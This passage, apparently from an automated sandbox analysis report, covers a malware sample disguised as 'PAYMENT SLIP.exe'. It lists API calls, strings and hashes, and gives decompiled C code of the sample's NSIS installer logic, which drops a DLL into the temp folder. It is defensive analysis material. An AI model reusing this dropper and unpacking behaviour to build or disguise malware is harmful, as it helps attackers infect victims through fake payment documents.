              • lstrcmpiW.KERNEL32(?,.exe,KXCJDFJSKF,?,?,?,KXCJDFJSKF,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403D1F
              • GetFileAttributesW.KERNEL32(KXCJDFJSKF), ref: 00403D2A
              • LoadImageW.USER32 ref: 00403D73
              • RegisterClassW.USER32 ref: 00403DB0
              • SystemParametersInfoW.USER32 ref: 00403DC8
              • CreateWindowExW.USER32 ref: 00403DFD
              • ShowWindow.USER32(00000005,00000000), ref: 00403E33
              • GetClassInfoW.USER32 ref: 00403E5F
              • GetClassInfoW.USER32 ref: 00403E6C
              • RegisterClassW.USER32 ref: 00403E75
              • DialogBoxParamW.USER32 ref: 00403E94
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
              • String ID: "C:\Users\user\Desktop\PAYMENT SLIP.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$KXCJDFJSKF$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
              • API String ID: 606308-2237092416
              • Opcode ID: e72121f9318e9a8d3ba69cbfb00b5424d628858843ee7b3eb32a151408395cbd
              • Instruction ID: e394074358681fdac01dfd3b015b47ae0866f78f7b6160babfbfeef1d79938ee
              • Opcode Fuzzy Hash: e72121f9318e9a8d3ba69cbfb00b5424d628858843ee7b3eb32a151408395cbd
              • Instruction Fuzzy Hash: EA61D570240200BAD720AF66AD45F2B3A7CEB84B09F40457FF941B22E2CB7D9D12867D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 99%
              			E00403068(void* __eflags, signed int _a4) {
              				DWORD* _v8;
              				DWORD* _v12;
              				intOrPtr _v16;
              				long _v20;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				intOrPtr _v32;
              				intOrPtr _v36;
              				signed int _v40;
              				short _v560;
              				signed int _t54;
              				void* _t57;
              				void* _t62;
              				intOrPtr _t65;
              				void* _t68;
              				intOrPtr* _t70;
              				intOrPtr _t71;
              				signed int _t77;
              				signed int _t82;
              				signed int _t83;
              				signed int _t89;
              				intOrPtr _t92;
              				long _t94;
              				signed int _t102;
              				signed int _t104;
              				void* _t106;
              				signed int _t107;
              				signed int _t110;
              				void* _t111;
              
              				_t94 = 0;
              				_v8 = 0;
              				_v12 = 0;
              				 *0x42a270 = GetTickCount() + 0x3e8;
              				GetModuleFileNameW(0, L"C:\\Users\\jones\\Desktop\\PAYMENT SLIP.exe", 0x400);
              				_t106 = E00406032(L"C:\\Users\\jones\\Desktop\\PAYMENT SLIP.exe", 0x80000000, 3);
              				 *0x40a018 = _t106;
              				if(_t106 == 0xffffffff) {
              					return L"Error launching installer";
              				}
              				E0040653C(0x436800, L"C:\\Users\\jones\\Desktop\\PAYMENT SLIP.exe");
              				E0040653C(0x439000, E00405E5D(0x436800));
              				_t54 = GetFileSize(_t106, 0);
              				__eflags = _t54;
              				 *0x420f00 = _t54;
              				_t110 = _t54;
              				if(_t54 <= 0) {
              					L24:
              					E00402FC6(1);
              					__eflags =  *0x42a278 - _t94;
              					if( *0x42a278 == _t94) {
              						goto L32;
              					}
              					__eflags = _v12 - _t94;
              					if(_v12 == _t94) {
              						L28:
              						_t57 = GlobalAlloc(0x40, _v20); // executed
              						_t111 = _t57;
              						E00406A8C(0x40ce68);
              						E00406061(0x40ce68,  &_v560, L"C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
              						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
              						__eflags = _t62 - 0xffffffff;
              						 *0x40a01c = _t62;
              						if(_t62 != 0xffffffff) {
              							_t65 = E00403590( *0x42a278 + 0x1c);
              							 *0x420f04 = _t65;
              							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
              							_t68 = E00403309(_v16, 0xffffffff, _t94, _t111, _v20); // executed
              							__eflags = _t68 - _v20;
              							if(_t68 == _v20) {
              								__eflags = _v40 & 0x00000001;
              								 *0x42a274 = _t111;
              								 *0x42a27c =  *_t111;
              								if((_v40 & 0x00000001) != 0) {
              									 *0x42a280 =  *0x42a280 + 1;
              									__eflags =  *0x42a280;
              								}
              								_t45 = _t111 + 0x44; // 0x44
              								_t70 = _t45;
              								_t102 = 8;
              								do {
              									_t70 = _t70 - 8;
              									 *_t70 =  *_t70 + _t111;
              									_t102 = _t102 - 1;
              									__eflags = _t102;
              								} while (_t102 != 0);
              								_t71 =  *0x420ef4; // 0x3770f
              								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
              								E00405FED(0x42a2a0, _t111 + 4, 0x40);
              								__eflags = 0;
              								return 0;
              							}
              							goto L32;
              						}
              						return L"Error writing temporary file. Make sure your temp folder is valid.";
              					}
              					E00403590( *0x420ef0);
              					_t77 = E0040357A( &_a4, 4);
              					__eflags = _t77;
              					if(_t77 == 0) {
              						goto L32;
              					}
              					__eflags = _v8 - _a4;
              					if(_v8 != _a4) {
              						goto L32;
              					}
              					goto L28;
              				} else {
              					do {
              						_t107 = _t110;
              						asm("sbb eax, eax");
              						_t82 = ( ~( *0x42a278) & 0x00007e00) + 0x200;
              						__eflags = _t110 - _t82;
              						if(_t110 >= _t82) {
              							_t107 = _t82;
              						}
              						_t83 = E0040357A(0x418ef0, _t107);
              						__eflags = _t83;
              						if(_t83 == 0) {
              							E00402FC6(1);
              							L32:
              							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
              						}
              						__eflags =  *0x42a278;
              						if( *0x42a278 != 0) {
              							__eflags = _a4 & 0x00000002;
              							if((_a4 & 0x00000002) == 0) {
              								E00402FC6(0);
              							}
              							goto L20;
              						}
              						E00405FED( &_v40, 0x418ef0, 0x1c);
              						_t89 = _v40;
              						__eflags = _t89 & 0xfffffff0;
              						if((_t89 & 0xfffffff0) != 0) {
              							goto L20;
              						}
              						__eflags = _v36 - 0xdeadbeef;
              						if(_v36 != 0xdeadbeef) {
              							goto L20;
              						}
              						__eflags = _v24 - 0x74736e49;
              						if(_v24 != 0x74736e49) {
              							goto L20;
              						}
              						__eflags = _v28 - 0x74666f73;
              						if(_v28 != 0x74666f73) {
              							goto L20;
              						}
              						__eflags = _v32 - 0x6c6c754e;
              						if(_v32 != 0x6c6c754e) {
              							goto L20;
              						}
              						_a4 = _a4 | _t89;
              						_t104 =  *0x420ef0; // 0x2f5b0
              						 *0x42a320 =  *0x42a320 | _a4 & 0x00000002;
              						_t92 = _v16;
              						__eflags = _t92 - _t110;
              						 *0x42a278 = _t104;
              						if(_t92 > _t110) {
              							goto L32;
              						}
              						__eflags = _a4 & 0x00000008;
              						if((_a4 & 0x00000008) != 0) {
              							L16:
              							_v12 = _v12 + 1;
              							_t110 = _t92 - 4;
              							__eflags = _t107 - _t110;
              							if(_t107 > _t110) {
              								_t107 = _t110;
              							}
              							goto L20;
              						}
              						__eflags = _a4 & 0x00000004;
              						if((_a4 & 0x00000004) != 0) {
              							break;
              						}
              						goto L16;
              						L20:
              						__eflags = _t110 -  *0x420f00; // 0x31437
              						if(__eflags < 0) {
              							_v8 = E00406A1E(_v8, 0x418ef0, _t107);
              						}
              						 *0x420ef0 =  *0x420ef0 + _t107;
              						_t110 = _t110 - _t107;
              						__eflags = _t110;
              					} while (_t110 != 0);
              					_t94 = 0;
              					__eflags = 0;
              					goto L24;
              				}
              			}

              APIs
              • GetTickCount.KERNEL32 ref: 0040307C
              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PAYMENT SLIP.exe,00000400), ref: 00403098
                • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\Desktop\PAYMENT SLIP.exe,80000000,00000003), ref: 00406036
                • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\PAYMENT SLIP.exe,C:\Users\user\Desktop\PAYMENT SLIP.exe,80000000,00000003), ref: 004030E1
              • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403223
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403072, 0040323B
              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004032BA
              • C:\Users\user\Desktop\PAYMENT SLIP.exe, xrefs: 00403082, 00403091, 004030A5, 004030C2
              • soft, xrefs: 00403156
              • Null, xrefs: 0040315F
              • Error launching installer, xrefs: 004030B8
              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040326C
              • "C:\Users\user\Desktop\PAYMENT SLIP.exe" , xrefs: 00403068
              • Inst, xrefs: 0040314D
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
              • String ID: "C:\Users\user\Desktop\PAYMENT SLIP.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\PAYMENT SLIP.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
              • API String ID: 2803837635-1522885949
              • Opcode ID: 8e4e929ec00d298773cd7711401fbd042d30ada64bab94f08e83dcc7a4259e6b
              • Instruction ID: 3c019e557a6e0d840000321a6ffc1a5a74fe8930866e2d2a4a5af375f72a0401
              • Opcode Fuzzy Hash: 8e4e929ec00d298773cd7711401fbd042d30ada64bab94f08e83dcc7a4259e6b
              • Instruction Fuzzy Hash: 9B71E431A00204ABDB20DF64DD85B5E3EBCAB18315F2045BBF901B72D2D7789E458B6D
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 00B1126A: Sleep.KERNELBASE(?,?,034CF0BF), ref: 00B1128F
              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 00B118E7
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00B11960
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665765048.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false
              Similarity
              • API ID: AllocCreateFileSleepVirtual
              • String ID: 912b4404d7d84462b22a6b7539dd3e97
              • API String ID: 3031228858-2352350902
              • Opcode ID: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction ID: 1fd492af7bede425cca05e95a1c3dd708253566e77f8f832932e1e5fa3e89b85
              • Opcode Fuzzy Hash: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction Fuzzy Hash: FE025B25E54398E9EB61CBE4EC16BEDB7B5AF04B10F5044CAE608FA1D1D3B10AC4DB16
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E0040176F(FILETIME* __ebx, void* __eflags) {
              				void* __esi;
              				void* _t35;
              				void* _t43;
              				void* _t45;
              				FILETIME* _t51;
              				FILETIME* _t64;
              				void* _t66;
              				signed int _t72;
              				FILETIME* _t73;
              				FILETIME* _t77;
              				signed int _t79;
              				WCHAR* _t81;
              				void* _t83;
              				void* _t84;
              				void* _t86;
              
              				_t77 = __ebx;
              				 *(_t86 - 8) = E00402D3E(0x31);
              				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
              				_t35 = E00405E88( *(_t86 - 8));
              				_push( *(_t86 - 8));
              				_t81 = L"KXCJ";
              				if(_t35 == 0) {
              					lstrcatW(E00405E11(E0040653C(_t81, 0x436000)), ??);
              				} else {
              					E0040653C();
              				}
              				E004067EB(_t81);
              				while(1) {
              					__eflags =  *(_t86 + 8) - 3;
              					if( *(_t86 + 8) >= 3) {
              						_t66 = E0040689A(_t81);
              						_t79 = 0;
              						__eflags = _t66 - _t77;
              						if(_t66 != _t77) {
              							_t73 = _t66 + 0x14;
              							__eflags = _t73;
              							_t79 = CompareFileTime(_t73, _t86 - 0x24);
              						}
              						asm("sbb eax, eax");
              						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
              						__eflags = _t72;
              						 *(_t86 + 8) = _t72;
              					}
              					__eflags =  *(_t86 + 8) - _t77;
              					if( *(_t86 + 8) == _t77) {
              						E0040600D(_t81);
              					}
              					__eflags =  *(_t86 + 8) - 1;
              					_t43 = E00406032(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
              					__eflags = _t43 - 0xffffffff;
              					 *(_t86 - 0x38) = _t43;
              					if(_t43 != 0xffffffff) {
              						break;
              					}
              					__eflags =  *(_t86 + 8) - _t77;
              					if( *(_t86 + 8) != _t77) {
              						E004055A4(0xffffffe2,  *(_t86 - 8));
              						__eflags =  *(_t86 + 8) - 2;
              						if(__eflags == 0) {
              							 *((intOrPtr*)(_t86 - 4)) = 1;
              						}
              						L31:
              						 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t86 - 4));
              						__eflags =  *0x42a308;
              						goto L32;
              					} else {
              						E0040653C(0x40b5f8, _t83);
              						E0040653C(_t83, _t81);
              						E00406579(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp\nshD279.tmp\qm1tw12xr.dll",  *((intOrPtr*)(_t86 - 0x1c)));
              						E0040653C(_t83, 0x40b5f8);
              						_t64 = E00405BA2("C:\Users\jones\AppData\Local\Temp\nshD279.tmp\qm1tw12xr.dll",  *(_t86 - 0x30) >> 3) - 4;
              						__eflags = _t64;
              						if(_t64 == 0) {
              							continue;
              						} else {
              							__eflags = _t64 == 1;
              							if(_t64 == 1) {
              								 *0x42a308 =  &( *0x42a308->dwLowDateTime);
              								L32:
              								_t51 = 0;
              								__eflags = 0;
              							} else {
              								_push(_t81);
              								_push(0xfffffffa);
              								E004055A4();
              								L29:
              								_t51 = 0x7fffffff;
              							}
              						}
              					}
              					L33:
              					return _t51;
              				}
              				E004055A4(0xffffffea,  *(_t86 - 8));
              				 *0x42a334 =  *0x42a334 + 1;
              				_t45 = E00403309(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
              				 *0x42a334 =  *0x42a334 - 1;
              				__eflags =  *(_t86 - 0x24) - 0xffffffff;
              				_t84 = _t45;
              				if( *(_t86 - 0x24) != 0xffffffff) {
              					L22:
              					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
              				} else {
              					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
              					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
              						goto L22;
              					}
              				}
              				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
              				__eflags = _t84 - _t77;
              				if(_t84 >= _t77) {
              					goto L31;
              				} else {
              					__eflags = _t84 - 0xfffffffe;
              					if(_t84 != 0xfffffffe) {
              						E00406579(_t77, _t81, _t84, _t81, 0xffffffee);
              					} else {
              						E00406579(_t77, _t81, _t84, _t81, 0xffffffe9);
              						lstrcatW(_t81,  *(_t86 - 8));
              					}
              					_push(0x200010);
              					_push(_t81);
              					E00405BA2();
              					goto L29;
              				}
              				goto L33;
              			}

              APIs
              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
              • CompareFileTime.KERNEL32(-00000014,?,KXCJDFJSKF,KXCJDFJSKF,00000000,00000000,KXCJDFJSKF,00436000,?,?,00000031), ref: 004017D5
                • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                • Part of subcall function 004055A4: lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
                • Part of subcall function 004055A4: SetWindowTextW.USER32(00422728,00422728), ref: 00405611
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
              • String ID: C:\Users\user\AppData\Local\Temp\nshD279.tmp\qm1tw12xr.dll$KXCJDFJSKF
              • API String ID: 1941528284-3723141028
              • Opcode ID: 4b913798fb200dfea553bd9fe538fd44ff4447b51554b0a60bb8fefd456ad0c1
              • Instruction ID: 1f20f3305f5cdc04e1f2059eaac63a386f89c848407f65c8aae314978641b4a4
              • Opcode Fuzzy Hash: 4b913798fb200dfea553bd9fe538fd44ff4447b51554b0a60bb8fefd456ad0c1
              • Instruction Fuzzy Hash: 08419431500114BACF10BFB9DD85DAE7A79EF45729B20423FF422B10E2D73C8A519A6E
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 00B10A52
              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 00B10C1F
              Memory Dump Source
              • Source File: 00000001.00000002.665765048.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false
              Similarity
              • API ID: CreateFileFreeVirtual
              • String ID:
              • API String ID: 204039940-0
              • Opcode ID: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction ID: d73710b16fe3c6f4adec07d48eb8453be88729f5cb2ed52d118104664f8f251d
              • Opcode Fuzzy Hash: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction Fuzzy Hash: 2BA1DF34D14209EFDF10EFE4C985BEDBBB1EF08315F60849AE611BA2A0D7B55A91DB10
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004068C1(intOrPtr _a4) {
              				short _v576;
              				signed int _t13;
              				struct HINSTANCE__* _t17;
              				signed int _t19;
              				void* _t24;
              
              				_t13 = GetSystemDirectoryW( &_v576, 0x104);
              				if(_t13 > 0x104) {
              					_t13 = 0;
              				}
              				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
              					_t19 = 1;
              				} else {
              					_t19 = 0;
              				}
              				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
              				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
              				return _t17;
              			}

              APIs
              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
              • wsprintfW.USER32 ref: 00406913
              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406927
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: DirectoryLibraryLoadSystemwsprintf
              • String ID: %s%S.dll$UXTHEME$\
              • API String ID: 2200240437-1946221925
              • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
              • Instruction ID: 979e31ef7f6a653eb027d6e7281dab5f214eebcb072a06bc6d9d9cfc9f176359
              • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
              • Instruction Fuzzy Hash: BDF02B71501219A7CB14BB68DD0DF9B376CEB00304F10447EA646F10D0EB7CDA68CB98
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 00B11BDE: GetFileAttributesW.KERNELBASE(000000FF,00000000,8A5B2944,?,00000000,000000FF,1C200000), ref: 00B11BFF
              • CreateFileW.KERNELBASE(000000FF,80000000,00000007,00000000,00000003,00000080,00000000,00000000,000000FF,7F896FF1,000000FF,D6EB2188,000000FF,433A3842,000000FF,A5F15738), ref: 00B11B25
              Memory Dump Source
              • Source File: 00000001.00000002.665765048.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false
              Similarity
              • API ID: File$AttributesCreate
              • String ID:
              • API String ID: 415043291-0
              • Opcode ID: 13c43d67a1bd41c791ffee7eecdbab20b06a7b62dbc9f074a5a54340b611209a
              • Instruction ID: fc3f6b91006cef5fd6150284444b9a0b1592fba10deb8b245bf94757e2dccfd7
              • Opcode Fuzzy Hash: 13c43d67a1bd41c791ffee7eecdbab20b06a7b62dbc9f074a5a54340b611209a
              • Instruction Fuzzy Hash: 3B410630D44209FEEF11AFA4CC46BEEBAB1EF18312F6048A4F611B50A0E7714A91EF50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405A73(WCHAR* _a4) {
              				struct _SECURITY_ATTRIBUTES _v16;
              				struct _SECURITY_DESCRIPTOR _v36;
              				int _t22;
              				long _t23;
              
              				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
              				_v36.Owner = 0x4083f8;
              				_v36.Group = 0x4083f8;
              				_v36.Sacl = _v36.Sacl & 0x00000000;
              				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
              				_v16.lpSecurityDescriptor =  &_v36;
              				_v36.Revision = 1;
              				_v36.Control = 4;
              				_v36.Dacl = 0x4083e8;
              				_v16.nLength = 0xc;
              				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
              				if(_t22 != 0) {
              					L1:
              					return 0;
              				}
              				_t23 = GetLastError();
              				if(_t23 == 0xb7) {
              					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
              						goto L1;
              					}
              					return GetLastError();
              				}
              				return _t23;
              			}







              APIs
              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
              • GetLastError.KERNEL32 ref: 00405ACA
              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADF
              • GetLastError.KERNEL32 ref: 00405AE9
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A99
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: ErrorLast$CreateDirectoryFileSecurity
              • String ID: C:\Users\user\AppData\Local\Temp\
              • API String ID: 3449924974-3081826266
              • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
              • Instruction ID: 182fb86997ef6356dfbf0076fac1484c8d0c28c6014f2d3d8060d55cd567293f
              • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
              • Instruction Fuzzy Hash: 30010871D00619EADF019BA0C988BEFBFB8EF04315F00813AD545B6280D7789648CFA9
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00406061(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
              				intOrPtr _v8;
              				short _v12;
              				short _t12;
              				intOrPtr _t13;
              				signed int _t14;
              				WCHAR* _t17;
              				signed int _t19;
              				signed short _t23;
              				WCHAR* _t26;
              
              				_t26 = _a4;
              				_t23 = 0x64;
              				while(1) {
              					_t12 =  *L"nsa"; // 0x73006e
              					_t23 = _t23 - 1;
              					_v12 = _t12;
              					_t13 =  *0x40a5ac; // 0x61
              					_v8 = _t13;
              					_t14 = GetTickCount();
              					_t19 = 0x1a;
              					_v8 = _v8 + _t14 % _t19;
              					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
              					if(_t17 != 0) {
              						break;
              					}
              					if(_t23 != 0) {
              						continue;
              					} else {
              						 *_t26 =  *_t26 & _t23;
              					}
              					L4:
              					return _t17;
              				}
              				_t17 = _t26;
              				goto L4;
              			}












              APIs
              • GetTickCount.KERNEL32 ref: 0040607F
              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,004035D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822), ref: 0040609A
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00406066
              • nsa, xrefs: 0040606E
              • "C:\Users\user\Desktop\PAYMENT SLIP.exe" , xrefs: 00406061
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: CountFileNameTempTick
